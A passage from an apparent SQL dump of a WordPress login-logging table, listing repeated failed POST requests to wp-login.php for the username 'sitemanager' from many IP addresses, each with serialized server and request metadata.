Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39144\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745574886.618438;s:12:\"REQUEST_TIME\";i:1745574886;}}','94.23.61.165',0,'2025-04-25 15:24:48','1970-01-01 00:00:00'),(94297,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44134\";s:11:\"REMOTE_ADDR\";s:13:\"67.205.59.102\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745575311.1470571;s:12:\"REQUEST_TIME\";i:1745575311;}}','67.205.59.102',0,'2025-04-25 15:31:52','1970-01-01 00:00:00'),(94298,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35508\";s:11:\"REMOTE_ADDR\";s:12:\"42.112.239.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745575735.5075121;s:12:\"REQUEST_TIME\";i:1745575735;}}','42.112.239.8',0,'2025-04-25 15:38:57','1970-01-01 00:00:00'),(94299,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39562\";s:11:\"REMOTE_ADDR\";s:13:\"81.181.254.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745576158.0165031;s:12:\"REQUEST_TIME\";i:1745576158;}}','81.181.254.43',0,'2025-04-25 15:45:59','1970-01-01 00:00:00'),(94300,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43474\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745576582.032352;s:12:\"REQUEST_TIME\";i:1745576582;}}','51.178.81.248',0,'2025-04-25 15:53:03','1970-01-01 00:00:00'),(94301,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37316\";s:11:\"REMOTE_ADDR\";s:12:\"5.202.15.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745577002.2448139;s:12:\"REQUEST_TIME\";i:1745577002;}}','5.202.15.246',0,'2025-04-25 16:00:04','1970-01-01 00:00:00'),(94302,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40226\";s:11:\"REMOTE_ADDR\";s:13:\"192.34.56.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745577417.7131569;s:12:\"REQUEST_TIME\";i:1745577417;}}','192.34.56.148',0,'2025-04-25 16:06:59','1970-01-01 00:00:00'),(94303,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52160\";s:11:\"REMOTE_ADDR\";s:15:\"103.179.190.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745577830.959866;s:12:\"REQUEST_TIME\";i:1745577830;}}','103.179.190.244',0,'2025-04-25 16:13:52','1970-01-01 00:00:00'),(94304,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"13189\";s:11:\"REMOTE_ADDR\";s:14:\"20.245.238.242\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745578245.1606359;s:12:\"REQUEST_TIME\";i:1745578245;}}','20.245.238.242',0,'2025-04-25 16:20:47','1970-01-01 00:00:00'),(94305,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58566\";s:11:\"REMOTE_ADDR\";s:12:\"51.38.119.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745578654.2489409;s:12:\"REQUEST_TIME\";i:1745578654;}}','51.38.119.44',0,'2025-04-25 16:27:36','1970-01-01 00:00:00'),(94306,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50444\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.235.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745579061.2390349;s:12:\"REQUEST_TIME\";i:1745579061;}}','162.0.235.8',0,'2025-04-25 16:34:23','1970-01-01 